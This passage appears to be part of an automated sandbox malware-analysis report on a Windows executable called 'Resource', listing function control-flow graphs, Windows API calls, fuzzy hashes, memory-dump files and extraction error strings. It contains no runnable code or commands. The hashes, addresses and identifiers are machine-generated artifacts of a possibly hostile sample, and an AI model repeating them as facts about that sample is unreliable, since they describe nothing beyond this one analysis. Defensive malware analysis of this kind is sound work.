                                                                                                                                                                                                                                                              • Instruction ID: 876631c0111c31308d09774e2e837645b8a46d1748284da3524090716de1ca28
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd0b06326a7492ca6e80295eee68133b4651991604d025b60ce46eca4a378e7a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B1C033B3C6A345EA69AB2196503BD5291BF647C4F404131EA4EC7796EF2FE501C70A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 522 7ff6e60a1050-7ff6e60a10ab call 7ff6e60ab4e0 525 7ff6e60a10d3-7ff6e60a10eb call 7ff6e60b4f90 522->525 526 7ff6e60a10ad-7ff6e60a10d2 call 7ff6e60a2b30 522->526 531 7ff6e60a1109-7ff6e60a1119 call 7ff6e60b4f90 525->531 532 7ff6e60a10ed-7ff6e60a1104 call 7ff6e60a2890 525->532 538 7ff6e60a1137-7ff6e60a1147 531->538 539 7ff6e60a111b-7ff6e60a1132 call 7ff6e60a2890 531->539 537 7ff6e60a126c-7ff6e60a1281 call 7ff6e60ab1c0 call 7ff6e60b4f7c * 2 532->537 554 7ff6e60a1286-7ff6e60a12a0 537->554 541 7ff6e60a1150-7ff6e60a1175 call 7ff6e60b04dc 538->541 539->537 548 7ff6e60a125e 541->548 549 7ff6e60a117b-7ff6e60a1185 call 7ff6e60b0250 541->549 552 7ff6e60a1264 548->552 549->548 556 7ff6e60a118b-7ff6e60a1197 549->556 552->537 557 7ff6e60a11a0-7ff6e60a11c8 call 7ff6e60a9990 556->557 560 7ff6e60a1241-7ff6e60a125c call 7ff6e60a2b30 557->560 561 7ff6e60a11ca-7ff6e60a11cd 557->561 560->552 562 7ff6e60a11cf-7ff6e60a11d9 561->562 563 7ff6e60a123c 561->563 565 7ff6e60a1203-7ff6e60a1206 562->565 566 7ff6e60a11db-7ff6e60a11e8 call 7ff6e60b0c1c 562->566 563->560 569 7ff6e60a1219-7ff6e60a121e 565->569 570 7ff6e60a1208-7ff6e60a1216 call 7ff6e60aca40 565->570 572 7ff6e60a11ed-7ff6e60a11f0 566->572 569->557 571 7ff6e60a1220-7ff6e60a1223 569->571 570->569 574 7ff6e60a1225-7ff6e60a1228 571->574 575 7ff6e60a1237-7ff6e60a123a 571->575 576 7ff6e60a11fe-7ff6e60a1201 572->576 577 7ff6e60a11f2-7ff6e60a11fc call 7ff6e60b0250 572->577 574->560 579 7ff6e60a122a-7ff6e60a1232 574->579 575->552 576->560 577->569 577->576 579->541
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                                              • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                              • API String ID: 2030045667-1655038675
                                                                                                                                                                                                                                                              • Opcode ID: bdb384c9e64b09cb6cdd26a0bda7559202b6569f1b531109b5fa3a90d9bcb5b2
                                                                                                                                                                                                                                                              • Instruction ID: ea9620eea6b82eeff7a3b4b3f95c46e490f019282f5caa0c459c89ed62d3e10b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb384c9e64b09cb6cdd26a0bda7559202b6569f1b531109b5fa3a90d9bcb5b2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51F033A286A285EA209F51E6443BA6291FF857D4F444531ED4EC7789EF3FE904C30A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6E60BF56A,?,?,-00000018,00007FF6E60BB317,?,?,?,00007FF6E60BB20E,?,?,?,00007FF6E60B6452), ref: 00007FF6E60BF34C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6E60BF56A,?,?,-00000018,00007FF6E60BB317,?,?,?,00007FF6E60BB20E,?,?,?,00007FF6E60B6452), ref: 00007FF6E60BF358
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                              • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                              • Instruction ID: befc738353b9c88648b454e1f881a032ee9103db64f289d418ac3dc28bda752e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF412323B39A6245FA15CB169A007752391BF44BE0F589135DD1EDB788DF3FE849830A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 679 7ff6e60bc01c-7ff6e60bc042 680 7ff6e60bc044-7ff6e60bc058 call 7ff6e60b54a4 call 7ff6e60b54c4 679->680 681 7ff6e60bc05d-7ff6e60bc061 679->681 699 7ff6e60bc44e 680->699 683 7ff6e60bc437-7ff6e60bc443 call 7ff6e60b54a4 call 7ff6e60b54c4 681->683 684 7ff6e60bc067-7ff6e60bc06e 681->684 701 7ff6e60bc449 call 7ff6e60baea4 683->701 684->683 687 7ff6e60bc074-7ff6e60bc0a2 684->687 687->683 688 7ff6e60bc0a8-7ff6e60bc0af 687->688 691 7ff6e60bc0b1-7ff6e60bc0c3 call 7ff6e60b54a4 call 7ff6e60b54c4 688->691 692 7ff6e60bc0c8-7ff6e60bc0cb 688->692 691->701 697 7ff6e60bc0d1-7ff6e60bc0d7 692->697 698 7ff6e60bc433-7ff6e60bc435 692->698 697->698 703 7ff6e60bc0dd-7ff6e60bc0e0 697->703 702 7ff6e60bc451-7ff6e60bc468 698->702 699->702 701->699 703->691 706 7ff6e60bc0e2-7ff6e60bc107 703->706 708 7ff6e60bc109-7ff6e60bc10b 706->708 709 7ff6e60bc13a-7ff6e60bc141 706->709 712 7ff6e60bc132-7ff6e60bc138 708->712 713 7ff6e60bc10d-7ff6e60bc114 708->713 710 7ff6e60bc143-7ff6e60bc16b call 7ff6e60bdbbc call 7ff6e60baf0c * 2 709->710 711 7ff6e60bc116-7ff6e60bc12d call 7ff6e60b54a4 call 7ff6e60b54c4 call 7ff6e60baea4 709->711 742 7ff6e60bc188-7ff6e60bc1b3 call 7ff6e60bc844 710->742 743 7ff6e60bc16d-7ff6e60bc183 call 7ff6e60b54c4 call 7ff6e60b54a4 710->743 740 7ff6e60bc2c0 711->740 714 7ff6e60bc1b8-7ff6e60bc1cf 712->714 713->711 713->712 717 7ff6e60bc1d1-7ff6e60bc1d9 714->717 718 7ff6e60bc24a-7ff6e60bc254 call 7ff6e60c3f8c 714->718 717->718 721 7ff6e60bc1db-7ff6e60bc1dd 717->721 729 7ff6e60bc2de 718->729 730 7ff6e60bc25a-7ff6e60bc26f 718->730 721->718 727 7ff6e60bc1df-7ff6e60bc1f5 721->727 727->718 732 7ff6e60bc1f7-7ff6e60bc203 727->732 738 7ff6e60bc2e3-7ff6e60bc303 ReadFile 729->738 730->729 734 7ff6e60bc271-7ff6e60bc283 GetConsoleMode 730->734 732->718 736 7ff6e60bc205-7ff6e60bc207 732->736 734->729 739 7ff6e60bc285-7ff6e60bc28d 734->739 736->718 741 7ff6e60bc209-7ff6e60bc221 736->741 744 7ff6e60bc309-7ff6e60bc311 738->744 745 7ff6e60bc3fd-7ff6e60bc406 GetLastError 738->745 739->738 748 7ff6e60bc28f-7ff6e60bc2b1 ReadConsoleW 739->748 751 7ff6e60bc2c3-7ff6e60bc2cd call 7ff6e60baf0c 740->751 741->718 752 7ff6e60bc223-7ff6e60bc22f 741->752 742->714 743->740 744->745 746 7ff6e60bc317 744->746 749 7ff6e60bc423-7ff6e60bc426 745->749 750 7ff6e60bc408-7ff6e60bc41e call 7ff6e60b54c4 call 7ff6e60b54a4 745->750 754 7ff6e60bc31e-7ff6e60bc333 746->754 756 7ff6e60bc2b3 GetLastError 748->756 757 7ff6e60bc2d2-7ff6e60bc2dc 748->757 761 7ff6e60bc2b9-7ff6e60bc2bb call 7ff6e60b5438 749->761 762 7ff6e60bc42c-7ff6e60bc42e 749->762 750->740 751->702 752->718 760 7ff6e60bc231-7ff6e60bc233 752->760 754->751 764 7ff6e60bc335-7ff6e60bc340 754->764 756->761 757->754 760->718 768 7ff6e60bc235-7ff6e60bc245 760->768 761->740 762->751 771 7ff6e60bc342-7ff6e60bc35b call 7ff6e60bbc34 764->771 772 7ff6e60bc367-7ff6e60bc36f 764->772 768->718 779 7ff6e60bc360-7ff6e60bc362 771->779 775 7ff6e60bc371-7ff6e60bc383 772->775 776 7ff6e60bc3eb-7ff6e60bc3f8 call 7ff6e60bba74 772->776 780 7ff6e60bc3de-7ff6e60bc3e6 775->780 781 7ff6e60bc385 775->781 776->779 779->751 780->751 783 7ff6e60bc38a-7ff6e60bc391 781->783 784 7ff6e60bc393-7ff6e60bc397 783->784 785 7ff6e60bc3cd-7ff6e60bc3d8 783->785 786 7ff6e60bc3b3 784->786 787 7ff6e60bc399-7ff6e60bc3a0 784->787 785->780 789 7ff6e60bc3b9-7ff6e60bc3c9 786->789 787->786 788 7ff6e60bc3a2-7ff6e60bc3a6 787->788 788->786 791 7ff6e60bc3a8-7ff6e60bc3b1 788->791 789->783 790 7ff6e60bc3cb 789->790 790->780 791->789
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
                                                                                                                                                                                                                                                              • Instruction ID: 1d1b55883714e21f2e1ff98c15a793c00131c8657e1d3dfd824b38cd36eb15ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28C11633A2C7A791EBA19B5582003BD3754EF81B80F558131DA4E8739ACF7FE855830A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 902 7ff6e60bd520-7ff6e60bd545 903 7ff6e60bd813 902->903 904 7ff6e60bd54b-7ff6e60bd54e 902->904 905 7ff6e60bd815-7ff6e60bd825 903->905 906 7ff6e60bd550-7ff6e60bd582 call 7ff6e60badd8 904->906 907 7ff6e60bd587-7ff6e60bd5b3 904->907 906->905 909 7ff6e60bd5be-7ff6e60bd5c4 907->909 910 7ff6e60bd5b5-7ff6e60bd5bc 907->910 911 7ff6e60bd5d4-7ff6e60bd5e9 call 7ff6e60c3f8c 909->911 912 7ff6e60bd5c6-7ff6e60bd5cf call 7ff6e60bc8e0 909->912 910->906 910->909 917 7ff6e60bd5ef-7ff6e60bd5f8 911->917 918 7ff6e60bd703-7ff6e60bd70c 911->918 912->911 917->918 921 7ff6e60bd5fe-7ff6e60bd602 917->921 919 7ff6e60bd760-7ff6e60bd785 WriteFile 918->919 920 7ff6e60bd70e-7ff6e60bd714 918->920 922 7ff6e60bd790 919->922 923 7ff6e60bd787-7ff6e60bd78d GetLastError 919->923 924 7ff6e60bd716-7ff6e60bd719 920->924 925 7ff6e60bd74c-7ff6e60bd75e call 7ff6e60bcfd8 920->925 926 7ff6e60bd604-7ff6e60bd60c call 7ff6e60b4900 921->926 927 7ff6e60bd613-7ff6e60bd61e 921->927 928 7ff6e60bd793 922->928 923->922 929 7ff6e60bd738-7ff6e60bd74a call 7ff6e60bd1f8 924->929 930 7ff6e60bd71b-7ff6e60bd71e 924->930 950 7ff6e60bd6f0-7ff6e60bd6f7 925->950 926->927 932 7ff6e60bd620-7ff6e60bd629 927->932 933 7ff6e60bd62f-7ff6e60bd644 GetConsoleMode 927->933 935 7ff6e60bd798 928->935 929->950 936 7ff6e60bd7a4-7ff6e60bd7ae 930->936 937 7ff6e60bd724-7ff6e60bd736 call 7ff6e60bd0dc 930->937 932->918 932->933 940 7ff6e60bd6fc 933->940 941 7ff6e60bd64a-7ff6e60bd650 933->941 943 7ff6e60bd79d 935->943 944 7ff6e60bd7b0-7ff6e60bd7b5 936->944 945 7ff6e60bd80c-7ff6e60bd811 936->945 937->950 940->918 948 7ff6e60bd6d9-7ff6e60bd6eb call 7ff6e60bcb60 941->948 949 7ff6e60bd656-7ff6e60bd659 941->949 943->936 951 7ff6e60bd7e3-7ff6e60bd7ed 944->951 952 7ff6e60bd7b7-7ff6e60bd7ba 944->952 945->905 948->950 955 7ff6e60bd664-7ff6e60bd672 949->955 956 7ff6e60bd65b-7ff6e60bd65e 949->956 950->935 961 7ff6e60bd7ef-7ff6e60bd7f2 951->961 962 7ff6e60bd7f4-7ff6e60bd803 951->962 959 7ff6e60bd7d3-7ff6e60bd7de call 7ff6e60b5480 952->959 960 7ff6e60bd7bc-7ff6e60bd7cb 952->960 957 7ff6e60bd6d0-7ff6e60bd6d4 955->957 958 7ff6e60bd674 955->958 956->943 956->955 957->928 963 7ff6e60bd678-7ff6e60bd68f call 7ff6e60c4058 958->963 959->951 960->959 961->903 961->962 962->945 968 7ff6e60bd691-7ff6e60bd69d 963->968 969 7ff6e60bd6c7-7ff6e60bd6cd GetLastError 963->969 970 7ff6e60bd69f-7ff6e60bd6b1 call 7ff6e60c4058 968->970 971 7ff6e60bd6bc-7ff6e60bd6c3 968->971 969->957 970->969 975 7ff6e60bd6b3-7ff6e60bd6ba 970->975 971->957 973 7ff6e60bd6c5 971->973 973->963 975->971
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E60BD50B), ref: 00007FF6E60BD63C
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E60BD50B), ref: 00007FF6E60BD6C7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                                              • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                              • Instruction ID: 899556df24d1240243a510df2ced368ef94d61a771985846b87801c842b34331
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A91D263E2866285F7509F6596403FDABA0FB44B88F148139DE0E976C8DF7BD442C70A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                                              • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                              • Instruction ID: dbaae605a174a0d4ad378825ec9d1a22bb2b9239f6532ca101f7096b2bee768c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6251F773F2422246FB24CF249A457BC27A1AB40368F109135DD2ED7AEAEF3BA441C705
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452418845-0
                                                                                                                                                                                                                                                              • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                              • Instruction ID: 47ccc8f95ef8bbe0a561b6ca6e4e36fda7d4d77dae11c139fe3a304515a3ad43
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15311C33F2C27341FAA4AB6497513B923919F427C4F864435E94ECB2D7CE2FA844861B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                                              • Opcode ID: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
                                                                                                                                                                                                                                                              • Instruction ID: 7c1fade1599cc84c53e36ee7b7e0af6cd1e357b1e1973bf3333dd1f5431222ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D419323E2879283E7519F20A6103796360FF94764F10D374EA9C47ADADFBEA5E08705
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                              • Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                                                                                                                                                                                                                              • Instruction ID: f7fcd12de154b5314300b46ae27749178ae0b82c605cee19f4cff57a07970ff8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82D05E12F3862742EB142B711A8837C02155F89701F20543CE80B8A397CE3FA80D421A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                                                                                                                                              • Instruction ID: 8a8efaee42b4edcf294dfc17ceb8752dd15a398cb89d1b913044a2896abd81c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06511763B2926146FA789E26960477A6281FF40BA4F04C734DD6E877CDCF3FD500860A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
